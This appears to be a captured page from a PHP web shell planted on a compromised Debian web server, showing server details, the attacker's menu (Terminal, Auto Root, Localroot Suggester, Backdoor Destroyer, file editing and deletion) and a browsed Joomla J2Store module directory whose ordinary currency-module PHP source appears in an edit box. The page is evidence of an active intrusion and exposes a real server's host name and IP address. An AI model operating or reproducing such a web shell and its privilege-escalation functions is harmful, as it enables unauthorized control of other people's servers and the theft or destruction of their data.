Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
modules /
mod_j2store_currency /
Delete
Unzip
Name
Size
Permission
Date
Action
css
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
tmpl
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
helper.php
840
B
-rwxr-xr-x
2022-02-20 10:42
index.html
44
B
-rwxr-xr-x
2022-02-20 10:42
mod_j2store_currency.php
1.46
KB
-rwxr-xr-x
2022-02-20 10:42
mod_j2store_currency.xml
2.46
KB
-rwxr-xr-x
2022-02-20 10:42
Save
Rename
<?php /*------------------------------------------------------------------------ # mod_j2store_cart - J2 Store Cart # ------------------------------------------------------------------------ # author Sasi varna kumar - Weblogicx India http://www.weblogicxindia.com # copyright Copyright (C) 2014 - 19 Weblogicxindia.com. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://j2store.org # Technical Support: Forum - http://j2store.org/forum/index.html -------------------------------------------------------------------------*/ // no direct access defined( '_JEXEC' ) or die( 'Restricted access' ); if (!defined('F0F_INCLUDED')) { include_once JPATH_LIBRARIES . '/f0f/include.php'; } require_once( dirname(__FILE__).'/helper.php' ); require_once(JPATH_ADMINISTRATOR.'/components/com_j2store/helpers/j2store.php'); JFactory::getLanguage()->load('com_j2store', JPATH_ADMINISTRATOR); $currencies = ModJ2StoreCurrencyHelper::getCurrencies($params); $currency = J2Store::currency(); $currency_code = $currency->getCode(); $moduleclass_sfx = $params->get('moduleclass_sfx',''); $background_color = $params->get('background_color', '#FFFFFF'); $text_color = $params->get('text_color', '#000000'); $link_color = $params->get('link_color', '#CCCCCC'); $link_hover_color = $params->get('link_hover_color', '#000000'); $active_link_color = $params->get('active_link_color', '#000000'); require( JModuleHelper::getLayoutPath('mod_j2store_currency') );